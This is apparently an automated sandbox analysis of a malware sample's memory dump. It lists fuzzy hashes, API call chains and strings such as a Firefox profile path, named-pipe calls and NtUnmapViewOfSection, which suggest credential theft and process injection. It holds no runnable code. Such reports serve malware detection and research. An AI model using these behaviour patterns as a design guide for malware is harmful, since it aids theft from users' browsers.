  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 19
  • API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject
  • String ID: %APPDATA%\Mozilla\Firefox\Profiles
  • API String ID: 2346524515-3215297822
  • Opcode ID: 04e48ca811839595ab19984103b0a713a9098f9930145295782b9b8a8acae543
  • Instruction ID: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
  • Opcode Fuzzy Hash: 64110C72556761C8C9256C84281E37A35C3FA833D3D2C7703EDA071A8B4B8261ECBD98
  • Instruction Fuzzy Hash: effeb2e01b4a51d3d610c8b01d7388b0104aa6fb8cbfa1868068c1e0be09bfdc
APIs
    • Part of subcall function 001D83A0: GetProcAddress.KERNEL32(001ED992,001C6C3C,00000000), ref: 001D83B4
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
    • Part of subcall function 001C3996: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001C3996: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
    • Part of subcall function 001C3996: GetLastError.KERNEL32 ref: 001C3A9B
    • Part of subcall function 001C3996: HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 35
  • API ID: FlushFileBuffersGetLastErrormemset
  • String ID: K$P
  • API String ID: 1157411244-420285281
  • Opcode ID: b776852dc2126f9b1b4d2b6506190c96010406ec9a84ebb4623d6614876d6961
  • Instruction ID: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
  • Opcode Fuzzy Hash: 8CF07B5009DB0086D877E4020147FC67EA2B782DC5C94B7E134D1B2F5F2E10914AD758
  • Instruction Fuzzy Hash: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
APIs
  • memset.NTDLL ref: 001D6A41
  • FlushFileBuffers.KERNEL32(00000000), ref: 001D6AA8
  • GetLastError.KERNEL32(?,00000000,00000000), ref: 001D6AB2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
